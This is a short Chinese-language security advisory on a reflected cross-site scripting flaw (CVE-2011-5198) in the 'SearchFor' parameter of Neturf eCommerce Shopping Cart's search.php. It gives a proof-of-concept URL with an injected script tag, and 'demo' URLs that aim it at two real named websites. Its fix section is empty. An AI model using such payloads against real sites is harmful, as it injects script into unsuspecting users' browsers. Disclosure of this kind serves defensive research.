Neturf eCommerce Shopping Cart “SearchFor”跨站脚本执行漏洞
Neturf eCommerce Shopping Cart “SearchFor”跨站脚本执行漏洞
发布日期:2012-09-23
更新日期:2012-10-02
受影响系统:
neturf eCommerce Shopping Cart
描述:
--------------------------------------------------------------------------------
CVE(CAN) ID: CVE-2011-5198
Neturf eCommerce Shopping Cart是一个网络购物车应用。
Neturf eCommerce Shopping Cart没有正确过滤传递到search.php内"SearchFor"参数的输入,即返回给用户,可被利用在受影响站点的用户浏览器中执行任意HTML和脚本代码。
<*来源:farbodmahini
链接:http://secunia.com/advisories/47354
http://packetstormsecurity.org/files/108231/neturf-xss.txt
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
# Exploit:
#
# http://target.com/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
#
#
# Demo:
#
# www.neturf.com/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
# www.darkhorseobservatory.org/search.php?SearchFor=<script>alert(/farbodmahini/)</script>
#
建议:
评论暂时关闭